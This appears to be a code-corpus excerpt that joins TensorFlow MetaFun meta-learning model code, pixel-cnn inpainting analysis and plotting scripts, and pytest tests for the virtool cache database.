initializer=tf.constant_initializer(1.0), trainable=True)
lengthscale = tf.compat.v1.get_variable("lengthscale", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
_keys = tf.tile(tf.expand_dims(keys, axis=1), [1, num_querys, 1])
_querys = tf.tile(tf.expand_dims(querys, axis=0), [num_keys, 1, 1])
sq_norm = tf.reduce_sum((_keys - _querys)**2, axis=-1)
kernel_qk = sigma**2 * tf.exp(- sq_norm / (2.*lengthscale**2))
k = kernel_qk
v = tf.einsum('kq,kv->qv', k, values)
return v
@snt.reuse_variables
def deep_se_kernel(self, querys, keys, values, iter=""):
with tf.compat.v1.variable_scope("deep_se_kernel{}".format(iter), reuse=tf.compat.v1.AUTO_REUSE):
# deep embedding of keys and querys
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
module = snt.nets.MLP(
[self.embedding_dim] * self._embedding_layers,
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
keys = snt.BatchApply(module, n_dims=1)(keys)
querys = snt.BatchApply(module, n_dims=1)(querys)
num_keys = tf.shape(keys)[0]
num_querys = tf.shape(querys)[0]
with tf.compat.v1.variable_scope("deep_se_kernel"):
sigma = tf.compat.v1.get_variable("sigma", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
lengthscale = tf.compat.v1.get_variable("lengthscale", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
# compute \sum_i k(x, x_i)u_i
_keys = tf.tile(tf.expand_dims(keys, axis=1), [1, num_querys, 1])
_querys = tf.tile(tf.expand_dims(querys, axis=0), [num_keys, 1, 1])
sq_norm = tf.reduce_sum((_keys - _querys)**2, axis=-1)
kernel_qk = sigma**2 * tf.exp(- sq_norm / (2.*lengthscale**2))
k = kernel_qk
v = tf.einsum('kq,kv->qv', k, values)
return v
@snt.reuse_variables
def attention_block(self, querys, keys, values, iter=""):
config = {
"rep": "mlp",
"output_sizes": [self.embedding_dim] * self._embedding_layers,
"att_type": self._attention_type,
"normalise": True,
"scale": 1.0,
"l2_penalty_weight": self._l2_penalty_weight,
"nonlinearity": self._nonlinearity,
}
with tf.compat.v1.variable_scope("attention_block{}".format(iter), reuse=tf.compat.v1.AUTO_REUSE):
attention = Attention(config=config)
v = attention(keys, querys, values)
return v
### Decoder ###
@snt.reuse_variables
def forward_decoder(self, cls_reprs):
if self._no_decoder:
# use functional representation directly as the predictor, used in ablation study
tf.compat.v1.logging.info("no decoder used")
return cls_reprs
s = cls_reprs.shape.as_list()
cls_reprs = tf.reshape(cls_reprs, s[:-1]+[self._num_classes, self._dim_reprs])
weights_dist_params = self.decoder(cls_reprs)
fan_in = self.embedding_dim
fan_out = self._num_classes
stddev_offset = np.sqrt(2. / (fan_out + fan_in))
classifier_weights = self.sample(weights_dist_params,
stddev_offset=stddev_offset)
return classifier_weights
# this decoder generates weights of softmax
@snt.reuse_variables
def decoder(self, inputs):
with tf.compat.v1.variable_scope("decoder"):
l2_regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
orthogonality_reg = get_orthogonality_regularizer(
self._orthogonality_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
# 2 * embedding_dim, because we are returning means and variances
decoder_module = snt.Linear(
self.embedding_dim * 2,
use_bias=True,
regularizers={"w": l2_regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(decoder_module, n_dims=2)(inputs)
self._orthogonality_reg = orthogonality_reg(decoder_module.w)
return outputs
### Other ###
@property
def dropout_rate(self):
return self._dropout_rate if self.is_training else 0.0
@property
def _l2_regularization(self):
return tf.cast(tf.reduce_sum(tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.REGULARIZATION_LOSSES)),
dtype=self._float_dtype)
def loss_fn(self, model_outputs, original_classes):
original_classes = tf.squeeze(original_classes, axis=-1)
one_hot_outputs = tf.one_hot(original_classes, depth=self._num_classes)
return tf.compat.v1.losses.softmax_cross_entropy(onehot_labels=one_hot_outputs, logits=model_outputs, \
label_smoothing=self._label_smoothing, reduction=tf.compat.v1.losses.Reduction.NONE)
def predict(self, inputs, weights):
if self._no_decoder:
return weights
after_dropout = tf.nn.dropout(inputs, rate=self.dropout_rate)
preds = tf.einsum("ik,imk->im", after_dropout, weights)
return preds
def calculate_loss_and_acc(self, inputs, true_outputs, classifier_weights):
model_outputs = self.predict(inputs, classifier_weights)
model_predictions = tf.argmax(
model_outputs, -1, output_type=self._int_dtype)
accuracy = tf.contrib.metrics.accuracy(model_predictions,
tf.squeeze(true_outputs, axis=-1))
return self.loss_fn(model_outputs, true_outputs), accuracy
def sample(self, distribution_params, stddev_offset=0.):
means, unnormalized_stddev = tf.split(distribution_params, 2, axis=-1)
stddev = tf.exp(unnormalized_stddev)
stddev -= (1. - stddev_offset)
stddev = tf.maximum(stddev, 1e-10)
distribution = tf.distributions.Normal(loc=means, scale=stddev)
if not self.is_training:
return means
samples = distribution.sample()
return samples
@property
def _decoder_orthogonality_reg(self):
return self._orthogonality_reg
class MetaFunRegressor(snt.AbstractModule):
def __init__(self, name="MetaFunRegressor"):
super(MetaFunRegressor, self).__init__(name=name)
self._float_dtype = tf.float32
self._int_dtype = tf.int32
# components configurations
self._use_kernel = FLAGS.use_kernel
self._use_gradient = FLAGS.use_gradient
self._attention_type = FLAGS.attention_type
self._kernel_type = FLAGS.kernel_type
self._no_decoder = FLAGS.no_decoder
if self._no_decoder:
self._dim_reprs = 1
self._initial_state_type = FLAGS.initial_state_type
# neural module configurations
self._nn_size = FLAGS.nn_size
self._nn_layers = FLAGS.nn_layers
self._dim_reprs = FLAGS.dim_reprs
self._num_iters = FLAGS.num_iters
self._embedding_layers = FLAGS.embedding_layers
# regularisation configurations
self._l2_penalty_weight = FLAGS.l2_penalty_weight
self._dropout_rate = FLAGS.dropout_rate
self._orthogonality_penalty_weight = FLAGS.orthogonality_penalty_weight
#
self._initial_inner_lr = FLAGS.initial_inner_lr
self._orthogonality_reg = 0
self._loss_type = "mse" # mse | log_prob
self._nonlinearity = tf.nn.relu
self._repr_as_inputs = FLAGS.repr_as_inputs
def _build(self, data, is_training=True):
self.is_training = is_training
self.embedding_dim = data.tr_input.get_shape()[-1].value
tr_input = data.tr_input
val_input = data.val_input
tr_output = data.tr_output
val_output = data.val_output
# initial states
tr_reprs = self.forward_initialiser(tr_input)
val_reprs = self.forward_initialiser(val_input)
all_tr_reprs = [tr_reprs]
all_val_reprs = [val_reprs]
# inner learning rate
alpha = tf.compat.v1.get_variable("alpha", [1, 1], dtype=self._float_dtype,
initializer=tf.constant_initializer(self._initial_inner_lr), trainable=True)
# iterative functional updating
for k in range(self._num_iters):
updates = self.forward_local_updater(r=tr_reprs, y=tr_output, x=tr_input)
tr_updates = alpha * self.forward_kernel_or_attention(querys=tr_input, keys=tr_input, values=updates)
val_updates = alpha * self.forward_kernel_or_attention(querys=val_input, keys=tr_input, values=updates)
tr_reprs += tr_updates
val_reprs += val_updates
all_tr_reprs.append(tr_reprs)
all_val_reprs.append(val_reprs)
# record predictions at each iteration for visualisation
all_val_mu = []
all_val_sigma = []
output_sizes = [self._nn_size] * (self._nn_layers-1) + [2] # architecture of the predictor
# decoder r_t(x) at each iteration into the predictor for visualisation
for k in range(self._num_iters+1):
weights = self.forward_decoder(all_tr_reprs[k], output_sizes=output_sizes) # generate weights of the predictor
tr_mu, tr_sigma = self.predict(tr_input, weights, output_sizes=output_sizes) # forward the predictor
weights = self.forward_decoder(all_val_reprs[k], output_sizes=output_sizes)
val_mu, val_sigma = self.predict(val_input, weights, output_sizes=output_sizes)
all_val_mu.append(val_mu)
all_val_sigma.append(val_sigma)
#
tr_loss, tr_metric = self.calculate_loss_and_metrics(
tr_output, tr_mu, tr_sigma)
val_loss, val_metric = self.calculate_loss_and_metrics(
val_output, val_mu, val_sigma)
batch_tr_loss = tf.reduce_mean(tr_loss)
batch_tr_metric = tf.reduce_mean(tr_metric)
batch_val_loss = tf.reduce_mean(val_loss)
batch_val_metric = tf.reduce_mean(val_metric)
#
all_val_mu = tf.stack(all_val_mu, axis=0)
all_val_sigma = tf.stack(all_val_sigma, axis=0)
#
regularization_penalty = (
self._l2_regularization + self._decoder_orthogonality_reg)
return batch_tr_loss + batch_val_loss + regularization_penalty, batch_tr_metric, batch_val_metric, \
data.tr_input, data.tr_output, data.tr_func, data.val_input, data.val_output, \
data.val_func, all_val_mu, all_val_sigma
### Initialiser r_0(x) ###
@snt.reuse_variables
def forward_initialiser(self, x):
num_points = tf.shape(x)[0]
if self._initial_state_type == 'zero':
reprs = self.constant_initialiser(num_points, trainable=False)
elif self._initial_state_type == "constant":
reprs = self.constant_initialiser(num_points, trainable=True)
elif self._initial_state_type == "parametric":
reprs = self.parametric_initialiser(x)
else:
raise NameError("Unknown initial state type")
tf.compat.v1.logging.info("forwarded {0} initialiser".format(self._initial_state_type))
return reprs
# r_0(x) = c
@snt.reuse_variables
def constant_initialiser(self, num_points, trainable=False):
with tf.compat.v1.variable_scope("constant_initialiser"):
if trainable:
init = tf.compat.v1.get_variable(
"initial_state", [1, self._dim_reprs],
dtype=self._float_dtype,
initializer=tf.constant_initializer(0.0), trainable=True)
else:
init = tf.zeros([1, self._dim_reprs])
init = tf.tile(init, [num_points, 1])
return init
# r_0(x) = MLP(x)
@snt.reuse_variables
def parametric_initialiser(self, x):
with tf.compat.v1.variable_scope("parametric_initialiser"):
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
module = snt.nets.MLP(
[self._nn_size] * self._nn_layers + [self._dim_reprs],
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(module, n_dims=1)(x)
return outputs
### Local Updater u ###
@snt.reuse_variables
def forward_local_updater(self, r, y, x):
if self._use_gradient:
updates = self.gradient_local_updater(r=r, y=y, x=x)
tf.compat.v1.logging.info("forwarded gradient local updater")
else:
updates = self.neural_local_updater(r=r, y=y, x=x)
tf.compat.v1.logging.info("forwarded neural local updater")
return updates
# neural local updater, for regression, we simply concatenate [r, y, x]
@snt.reuse_variables
def neural_local_updater(self, r, y, x=None):
with tf.compat.v1.variable_scope("neural_local_updater"):
if x is not None:
reprs = tf.concat([r, y, x], axis=-1)
else:
reprs = tf.concat([r, y], axis=-1)
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
module = snt.nets.MLP(
[self._nn_size] * self._nn_layers + [self._dim_reprs],
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(module, n_dims=1)(reprs)
return outputs
# gradient-based local updater, used in ablation study
@snt.reuse_variables
def gradient_local_updater(self, r, y, x=None):
with tf.compat.v1.variable_scope("gradient_local_updater"):
lr = tf.compat.v1.get_variable(
"lr", [1, self._dim_reprs],
dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
r = tf.stop_gradient(r)
weights = self.forward_decoder(r)
tr_mu, tr_sigma = self.predict(x, weights)
tr_loss, tr_mse = self.calculate_loss_and_metrics(
tr_mu, tr_sigma, y)
# self.debug_op = tf.gradients(weights, reprs)[0]
batch_tr_loss = tf.reduce_mean(tr_loss)
loss_grad = tf.gradients(batch_tr_loss, r)[0]
updates = - lr * loss_grad
return updates
### Kernel and Attention ###
@snt.reuse_variables
def forward_kernel_or_attention(self, querys, keys, values):
if self._use_kernel:
if self._kernel_type == "se":
rtn_values = self.squared_exponential_kernel(querys, keys, values)
elif self._kernel_type == 'deep_se':
rtn_values = self.deep_se_kernel(querys, keys, values)
else:
raise NameError("Unknown kernel type")
tf.compat.v1.logging.info("forwarded {0} kernel".format(self._kernel_type))
else:
rtn_values = self.attention_block(querys, keys, values)
tf.compat.v1.logging.info("forwarded {0} attention".format(self._attention_type))
return rtn_values
@snt.reuse_variables
def squared_exponential_kernel(self, querys, keys, values):
num_keys = tf.shape(keys)[0]
num_querys = tf.shape(querys)[0]
with tf.compat.v1.variable_scope("squared_exponential_kernel"):
sigma = tf.compat.v1.get_variable("sigma", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
lengthscale = tf.compat.v1.get_variable("lengthscale", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
_keys = tf.tile(tf.expand_dims(keys, axis=1), [1, num_querys, 1])
_querys = tf.tile(tf.expand_dims(querys, axis=0), [num_keys, 1, 1])
sq_norm = tf.reduce_sum((_keys - _querys)**2, axis=-1)
kernel_qk = sigma**2 * tf.exp(- sq_norm / (2.*lengthscale**2))
k = kernel_qk
v = tf.einsum('kq,kv->qv', k, values)
return v
@snt.reuse_variables
def deep_se_kernel(self, querys, keys, values):
with tf.compat.v1.variable_scope("deep_se_kernel"):
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
module = snt.nets.MLP(
[self._nn_size] * self._embedding_layers,
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
keys = snt.BatchApply(module, n_dims=1)(keys)
querys = snt.BatchApply(module, n_dims=1)(querys)
num_keys = tf.shape(keys)[0]
num_querys = tf.shape(querys)[0]
with tf.compat.v1.variable_scope("deep_se_kernel"):
sigma = tf.compat.v1.get_variable("sigma", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
lengthscale = tf.compat.v1.get_variable("lengthscale", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
# compute \sum_i k(x, x_i)u_i
_keys = tf.tile(tf.expand_dims(keys, axis=1), [1, num_querys, 1])
_querys = tf.tile(tf.expand_dims(querys, axis=0), [num_keys, 1, 1])
sq_norm = tf.reduce_sum((_keys - _querys)**2, axis=-1)
kernel_qk = sigma**2 * tf.exp(- sq_norm / (2.*lengthscale**2))
k = kernel_qk
v = tf.einsum('kq,kv->qv', k, values)
return v
@snt.reuse_variables
def attention_block(self, querys, keys, values):
config = {
"rep": "mlp",
"output_sizes": [self._nn_size] * self._embedding_layers,
"att_type": self._attention_type,
"normalise": True,
"scale": 1.0,
"l2_penalty_weight": self._l2_penalty_weight,
"nonlinearity": self._nonlinearity,
}
with tf.compat.v1.variable_scope("attention_block"):
attention = Attention(config=config)
v = attention(keys, querys, values)
return v
@snt.reuse_variables
def forward_decoder(self, reprs, output_sizes=[40,40,2]):
if self._no_decoder:
tf.compat.v1.logging.info("no decoder used")
return reprs
else:
weights_dist_params = self.decoder(reprs, output_sizes=output_sizes)
stddev_offset = np.sqrt(1. / self._nn_size)
weights = self.sample(weights_dist_params, stddev_offset=stddev_offset)
tf.compat.v1.logging.info("forwarded decoder")
return weights
@snt.reuse_variables
def decoder(self, reprs, output_sizes=[40,40,2]):
with tf.compat.v1.variable_scope("decoder"):
# _repr_as_inputs = True: Representation is used as inputs to the predictor
# _repr_as_inputs = False: Representation is used to generate weights of the predictor
if self._repr_as_inputs:
return reprs
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
num_layers = len(output_sizes)
output_sizes = [self.embedding_dim] + output_sizes
# count number of parameters in the predictor
num_params = 0
for i in range(num_layers):
num_params += (output_sizes[i]+1) * output_sizes[i+1]
# decode the representation into the weights of the predictor
module = snt.nets.MLP(
[self._nn_size] * self._nn_layers + [2 * num_params],
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(module, n_dims=1)(reprs)
return outputs
@snt.reuse_variables
def predict(self, inputs, weights, output_sizes=[40,40,2]):
# no_decoder = True: functional representation is the predictor itself (unused for regression problems)
if self._no_decoder:
if self._dim_reprs == 1: # predictive mean
return weights, tf.ones_like(weights) * 0.5
elif self._dim_reprs == 2: # predictive mean and std
return tf.split(weights, 2, axis=-1)
else:
raise Exception("num_reprs must <=2 if no_decoder")
if self._repr_as_inputs:
with tf.compat.v1.variable_scope("predict"):
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
outputs = tf.concat([weights, inputs], axis=-1) # weights is actually repr for repr_as_inputs=True
# construct the predictor conditioned on the repr (weights).
# repr is feeded into the network at each layer.
for i, s in enumerate(output_sizes):
module = snt.nets.MLP(
[s],
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(module, n_dims=1)(outputs)
if i < len(output_sizes)-1:
outputs = self._nonlinearity(outputs)
outputs = tf.concat([outputs, weights], axis=-1)
preds = outputs
else:
# use the generated weights to construct the predictor
num_layers = len(output_sizes)
output_sizes = [self.embedding_dim] + output_sizes
begin = 0
preds = inputs
for i in range(num_layers):
in_size = output_sizes[i]
out_size = output_sizes[i+1]
end = begin + in_size * out_size
w = tf.reshape(weights[:, begin:end], [-1, in_size, out_size])
b = tf.reshape(weights[:, end:end+out_size], [-1, out_size])
begin = end + out_size
preds = tf.einsum("ik,ikm->im", preds, w) + b
if i < num_layers - 1:
preds = self._nonlinearity(preds)
# return preds
mu, log_sigma = tf.split(preds, 2, axis=-1)
sigma = 0.1 + 0.9 * tf.nn.softplus(log_sigma)
return mu, sigma
def sample(self, distribution_params, stddev_offset=0.):
# here we consider a deterministic case, but one can try the probabilstic version
means, unnormalized_stddev = tf.split(distribution_params, 2, axis=-1)
return means
## probabilstic version:
# stddev = tf.exp(unnormalized_stddev)
# stddev -= (1. - stddev_offset)
# stddev = tf.maximum(stddev, 1e-10)
# distribution = tf.distributions.Normal(loc=means, scale=stddev)
# if not self.is_training:
# return means
# samples = distribution.sample()
# return samples
def loss_fn(self, model_outputs, labels):
return tf.losses.mean_squared_error(labels=labels, predictions=model_outputs,
reduction=tf.compat.v1.losses.Reduction.NONE)
def calculate_loss_and_metrics(self, target_y, mus, sigmas, coeffs=None):
if self._loss_type == "mse":
mu, sigma = mus, sigmas
mse = self.loss_fn(mu, target_y)
return mse, mse
elif self._loss_type == "log_prob":
mu, sigma = mus, sigmas
dist = tf.contrib.distributions.MultivariateNormalDiag(loc=mu, scale_diag=sigma)
loss = - dist.log_prob(target_y)
mse = self.loss_fn(mu, target_y)
return loss, loss
else:
raise NameError("unknown output_dist_type")
@property
def _l2_regularization(self):
return tf.cast(
tf.reduce_sum(tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.REGULARIZATION_LOSSES)),
dtype=self._float_dtype)
@property
def _decoder_orthogonality_reg(self):
return self._orthogonality_reg
# (Copy from https://github.com/deepmind/leo, see copyright and original license in our LICENSE file.)
def get_orthogonality_regularizer(orthogonality_penalty_weight):
"""Returns the orthogonality regularizer."""
def orthogonality(weight):
"""Calculates the layer-wise penalty encouraging orthogonality."""
with tf.name_scope(None, "orthogonality", [weight]) as name:
w2 = tf.matmul(weight, weight, transpose_b=True)
wn = tf.norm(weight, ord=2, axis=1, keepdims=True) + 1e-32
correlation_matrix = w2 / tf.matmul(wn, wn, transpose_b=True)
matrix_size = correlation_matrix.get_shape().as_list()[0]
base_dtype = weight.dtype.base_dtype
identity = tf.eye(matrix_size, dtype=base_dtype)
weight_corr = tf.reduce_mean(
tf.math.squared_difference(correlation_matrix, identity))
return tf.multiply(
tf.cast(orthogonality_penalty_weight, base_dtype),
weight_corr,
name=name)
return orthogonality
# Attention modules
# (Adapted from https://github.com/deepmind/neural-processes, see copyright and original license in our LICENSE file.)
def dot_product_attention(q, k, v, normalise):
"""Computes dot product attention.
Args:
q: queries. tensor of shape [B,m,d_k].
k: keys. tensor of shape [B,n,d_k].
v: values. tensor of shape [B,n,d_v].
normalise: Boolean that determines whether weights sum to 1.
Returns:
tensor of shape [B,m,d_v].
"""
d_k = tf.shape(q)[-1]
scale = tf.sqrt(tf.cast(d_k, tf.float32))
unnorm_weights = tf.einsum('jk,ik->ij', k, q) / scale # [B,m,n]
if normalise:
weight_fn = tf.nn.softmax
else:
weight_fn = tf.sigmoid
weights = weight_fn(unnorm_weights)
rep = tf.einsum('ik,kj->ij', weights, v)
return rep
class Attention(snt.AbstractModule):
def __init__(self, config=None, name="attention"):
super(Attention, self).__init__(name=name)
self._float_dtype = tf.float32
self._int_dtype = tf.int32
self._rep = config['rep']
self._output_sizes = config['output_sizes']
self._att_type = config['att_type']
self._normalise = config['normalise']
self._scale = config['scale']
self._l2_penalty_weight = config['l2_penalty_weight']
self._nonlinearity = config['nonlinearity']
def _build(self, x1, x2, r):
if self._rep == 'identity':
k, q = (x1, x2)
elif self._rep == 'mlp':
# Pass through MLP
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
module = snt.nets.MLP(
self._output_sizes,
activation=self._nonlinearity,
use_bias=True,
initializers={"w": initializer},
)
k = snt.BatchApply(module, n_dims=1)(x1)
q = snt.BatchApply(module, n_dims=1)(x2)
else:
raise NameError("'rep' not among ['identity','mlp']")
if self._att_type == 'dot_product':
rep = dot_product_attention(q, k, r, self._normalise)
else:
raise NameError(("'att_type' not among ['dot_product']"))
return rep
``` |
{
"source": "jinxu06/pixel-cnn",
"score": 2
} |
#### File: jinxu06/pixel-cnn/analyze.py
```python
import numpy as np
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import imageio
from utils import KL_divergence
plt.style.use("ggplot")
import cv2
def find_coutour(mask):
contour = np.zeros_like(mask)
h, w = mask.shape
for y in range(h):
for x in range(w):
if mask[y, x] > 0:
lower_bound = max(y-1, 0)
upper_bound = min(y+1, h-1)
left_bound = max(x-1, 0)
right_bound = min(x+1, w-1)
nb = mask[lower_bound:upper_bound+1, left_bound:right_bound+1]
if np.min(nb) == 0:
contour[y, x] = 1
return contour
def load_records(dir, label):
path = os.path.join(dir, "inpainting-record-{0}.npz".format(label))
d = np.load(path)
params = {}
params['num_images'] = d['dis'].shape[3]
params['num_pixels'] = d['dis'].shape[0]
return d['img'].astype(np.uint8), d['dis'], d['smp'], d['ms'], params
def get_image_record(records, image_id, t="image", dist_type="combine"):
img, dis, smp, ms, params = records
if t=='image':
return img[:, image_id, :, :, :]
elif t=='dist':
if dist_type=='forward':
return dis[:, :, 0, image_id, :]
elif dist_type=='backward':
return dis[:, :, 1, image_id, :]
elif dist_type=='combine':
return dis[:, :, 2, image_id, :]
elif dist_type=='prior':
return dis[:, :, 3, image_id, :]
else:
raise Exception(t+" type not found")
elif t=='sample':
return smp[:, image_id, :]
elif t=='mask':
return ms[image_id, :, :]
else:
raise Exception(t+" type not found")
def analyze_record(records, image_id):
_, _, _, _, params = records
num_images = params['num_images']
assert image_id < num_images, "image_id too large"
num_pixels = params['num_pixels']
images = get_image_record(records, image_id, t="image")
forward = get_image_record(records, image_id, t="dist", dist_type="forward")
backward = get_image_record(records, image_id, t="dist", dist_type="backward")
combine = get_image_record(records, image_id, t="dist", dist_type="combine")
prior = get_image_record(records, image_id, t="dist", dist_type="prior")
sample = get_image_record(records, image_id, t="sample")
cur_mask = get_image_record(records, image_id, t="mask")
for p in range(num_pixels):
cur_image = images[p]
cur_forward_dis = forward[p]
cur_backward_dis = backward[p]
cur_combine_dis = combine[p]
cur_prior_dis = prior[p]
cur_sample = sample[p]
plot(cur_forward_dis, cur_backward_dis, cur_combine_dis, cur_prior_dis, cur_image, cur_sample, cur_mask, pid=p)
def plot(forward_dist, backward_dist, combine_dist, prior_dist, image, sample, mask, pid):
fig = plt.figure(figsize=(8,8))
ax = fig.add_subplot(2,2,1)
contour = 1-find_coutour(mask)[:, :, None]
contour[contour<1] = 0.8
image = image * contour
ax.imshow(image.astype(np.uint8))
ax.axis("off")
# Red channel
b = 0
ax = fig.add_subplot(2,2,2)
ax.plot(np.arange(256), forward_dist[b], label="Forward KL={0:.2f}".format(KL_divergence(combine_dist[b], forward_dist[b]+1e-5)))
ax.plot(np.arange(256), backward_dist[b], label="Backward KL={0:.2f}".format(KL_divergence(combine_dist[b], backward_dist[b]+1e-5)))
ax.plot(np.arange(256), combine_dist[b], label="Combine KL={0:.2f}".format(KL_divergence(combine_dist[b], combine_dist[b]+1e-5)))
ax.plot(np.arange(256), prior_dist[b], label="Prior KL={0:.2f}".format(KL_divergence(combine_dist[b], prior_dist[b]+1e-5)))
ax.plot([sample[b]], [0.1], '-o', c='green', markersize=8)
ax.legend(loc=0)
ax.set_xlabel("red color code (8bit)")
ax.set_ylabel("density")
ax.set_ylim(0., 0.2)
# Green channel
b = 1
ax = fig.add_subplot(2,2,3)
ax.plot(np.arange(256), forward_dist[b], label="Forward KL={0:.2f}".format(KL_divergence(combine_dist[b], forward_dist[b]+1e-5)))
ax.plot(np.arange(256), backward_dist[b], label="Backward KL={0:.2f}".format(KL_divergence(combine_dist[b], backward_dist[b]+1e-5)))
ax.plot(np.arange(256), combine_dist[b], label="Combine KL={0:.2f}".format(KL_divergence(combine_dist[b], combine_dist[b]+1e-5)))
ax.plot(np.arange(256), prior_dist[b], label="Prior KL={0:.2f}".format(KL_divergence(combine_dist[b], prior_dist[b]+1e-5)))
ax.plot([sample[b]], [0.1], '-o', c='green', markersize=8)
ax.legend(loc=0)
ax.set_xlabel("green color code (8bit)")
ax.set_ylabel("density")
ax.set_ylim(0., 0.2)
# Blue channel
b = 2
ax = fig.add_subplot(2,2,4)
ax.plot(np.arange(256), forward_dist[b], label="Forward KL={0:.2f}".format(KL_divergence(combine_dist[b], forward_dist[b]+1e-5)))
ax.plot(np.arange(256), backward_dist[b], label="Backward KL={0:.2f}".format(KL_divergence(combine_dist[b], backward_dist[b]+1e-5)))
ax.plot(np.arange(256), combine_dist[b], label="Combine KL={0:.2f}".format(KL_divergence(combine_dist[b], combine_dist[b]+1e-5)))
ax.plot(np.arange(256), prior_dist[b], label="Prior KL={0:.2f}".format(KL_divergence(combine_dist[b], prior_dist[b]+1e-5)))
ax.plot([sample[b]], [0.1], '-o', c='green', markersize=8)
ax.legend(loc=0)
ax.set_xlabel("blue color code (8bit)")
ax.set_ylabel("density")
ax.set_ylim(0., 0.2)
plt.tight_layout()
fig.savefig("plots-{0}/plot-{1}-{2}.png".format(exp_label, image_id, str(pid).zfill(4))) #, dpi='figure')
plt.close()
def make_movie(dir, duration=0.5, name='movie', frame_step=1):
images = []
dirpath, dirnames, filenames = next(os.walk(dir))
filenames = sorted(list(filter(lambda x: x.endswith(".png"), filenames)))
filenames = filenames[::frame_step]
for f in filenames:
if ".png" in f:
images.append(imageio.imread(os.path.join(dir, f)))
imageio.mimsave(os.path.join(dir, "{0}.gif".format(name)), images, "GIF", duration=duration)
image_id = 0
exp_label = "celeba-hr-half"
DATA_DIR = "/Users/Aaron-MAC/Code/ImageInpainting"
#DATA_DIR = "/data/ziz/jxu"
# records = load_records(DATA_DIR, exp_label)
# if not os.path.exists("plots-{0}".format(exp_label)):
# os.makedirs("plots-{0}".format(exp_label))
#
# analyze_record(records, image_id)
make_movie("plots-{0}".format(exp_label), 0.5, 'reduce-movie-{0}-{1}'.format(exp_label, image_id), frame_step=10)
```
#### File: jinxu06/pixel-cnn/diff.py
```python
import numpy as np
from PIL import Image
from utils import *
from evaluation import *
def find_contour(mask):
contour = np.zeros_like(mask)
h, w = mask.shape
for y in range(h):
for x in range(w):
if mask[y, x] > 0:
lower_bound = max(y-1, 0)
upper_bound = min(y+1, h-1)
left_bound = max(x-1, 0)
right_bound = min(x+1, w-1)
nb = mask[lower_bound:upper_bound+1, left_bound:right_bound+1]
if np.min(nb) == 0:
contour[y, x] = 1
return contour
def tile_plot(imgs, file_path="../plots/test.png", display_size=None):
if display_size is None:
s = int(np.sqrt(imgs.shape[0]))
display_size = (s, s)
img = Image.fromarray(tile_images(imgs.astype(np.uint8), size=display_size), 'RGB')
img.save(file_path)
#mgen = mk.CenterMaskGenerator(32, 32, 0.5)
mgen = mk.CrossMaskGenerator(64, 64, (28, 38, 2, 62), (5, 59, 28, 36))
mask = mgen.gen(1)[0]
contour = find_contour(mask)[:, :, None]
data = np.load("psnr-cross-gan.npz")
all_completed = data['comp']
ground_truth = data['ori']
delta = np.abs(np.mean(all_completed, axis=0) - ground_truth)
delta += contour * 100
tile_plot(delta, "../plots1/celeba-cross-gan.png")
``` |
{
"source": "jinxuchen/virtool",
"score": 2
} |
#### File: tests/caches/test_db.py
```python
import pytest
from aiohttp.test_utils import make_mocked_coro
import virtool.caches.db
import virtool.utils
@pytest.fixture
def create_result(static_time, trim_parameters):
return {
"created_at": static_time.datetime,
"files": [],
"hash": "68b60be51a667882d3aaa02a93259dd526e9c990",
"legacy": False,
"paired": False,
"parameters": trim_parameters,
"program": "skewer-0.2.2",
"ready": False,
"sample": {
"id": "foo"
}
}
@pytest.fixture
def trim_parameters():
return {
"end_quality": "20",
"mode": "pe",
"max_error_rate": "0.1",
"max_indel_rate": "0.03",
"max_length": None,
"mean_quality": "25",
"min_length": "20"
}
def test_calculate_cache_hash(trim_parameters):
hashed = virtool.caches.db.calculate_cache_hash(trim_parameters)
assert hashed == "68b60be51a667882d3aaa02a93259dd526e9c990"
@pytest.mark.parametrize("paired", [True, False], ids=["paired", "unpaired"])
def test_create(paired, dbs, test_random_alphanumeric, create_result, trim_parameters):
"""
Test that the function works with default keyword arguments and when `paired` is either `True` or `False`.
"""
cache_id = virtool.caches.db.create(dbs, "foo", trim_parameters, paired)
assert dbs.caches.find_one() == {
**create_result,
"_id": test_random_alphanumeric.last_choice,
"paired": paired
}
